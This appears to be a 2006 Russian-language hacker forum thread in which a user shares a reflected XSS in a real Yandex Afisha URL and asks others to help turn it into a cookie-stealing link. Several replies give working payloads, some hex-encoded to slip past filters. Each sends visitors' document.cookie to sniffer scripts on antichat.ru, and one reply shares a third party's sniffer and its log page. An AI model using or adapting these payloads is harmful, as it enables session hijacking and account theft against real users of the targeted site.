Xss на яндексе... Требуеца помощь

Discussion in 'Песочница' started by IDentety, 18 Dec 2006.

  1. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    PHP:
    http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
    Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


    Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать :)
     
  2. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    http://forum.antichat.ru/thread19610.html
     
  3. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
     
  4. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!
     
  5. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.
     
  6. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...
     
  7. Retscan

    Retscan Member

    Joined:
    17 Dec 2006
    Messages:
    25
    Likes Received:
    9
    Reputations:
    11
    На, лови:
    Code:
    http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E
    Плюс не забудь ;)
     
    1 person likes this.
  8. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Можешь соорудить что нибудь этакое
    <script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>
     
    #8 Constantine, 18 Dec 2006
    Last edited: 18 Dec 2006
  9. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    вот соорудил я конструкцию такого вида

    http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E

    но отчеты не приходят.. видно гдето абшибся
     
  10. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg
     
  11. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    аха.. вижу.. значит правим http://antichat.ru/s/мойсниф.jpg на http://antichat.ru/cgi-bin/мойсниф.jpg и все должно пойти?
     
  12. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    _http://antichat.ru/cgi-bin/s.jpg
    Вот это поставь и всё.
     
  13. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    хм всеравно кукы на античатовский сниффер не лезут.... Ничего не понимаю.... чеж за фигнято.. =((
     
  14. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    СмоРи и Юзай... ;)

    Code:
    http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
    ВообЩем кто не понял... заходим к примеру на http://ha.ckers.org/xss.html
    там в самон низу есть
    Character Encoding Calculator
    ASCII Text:
    значит сюда вбиваем "><script>img = new Image(); img.src = "http://site/ваш_сниф.gif?"+document.cookie;</script>
    и жМЁм Encode и получаем в строке Hex Value: наШу хренотень..и вставляем куда надо..

    аВось кто ПлюсиК поставит...
     
    #14 DimOnOID, 18 Dec 2006
    Last edited: 18 Dec 2006
    2 people like this.
  15. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    На вот проверь этот сниф!
    ССылка на него:
    http://antichat.ru/s/lol.gif

    А логи посмотришь здесь!
    http://antichat.ru/s/lol/log.php?

    Я проверял !работает!
    Но пользуйся аккуратно он чужой! ))
     
    1 person likes this.
  16. IDentety

    IDentety Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    45
    Likes Received:
    31
    Reputations:
    27
    Все ок.. Видимо чтото я при создании сниффера накосячил... Всем кто помогал + к репе... Спасибо парни
     
  17. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Или так:
    http://afisha.yandex.ru/reviews.xml?event_id=14913381&city="><script>img=new%20Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"%2Bdocument.cookie</script>

    Лог смотри тут:
    http://antichat.ru/sniff/log.php
    ---
    Там плюс вырезался.
     
    _________________________
Loading...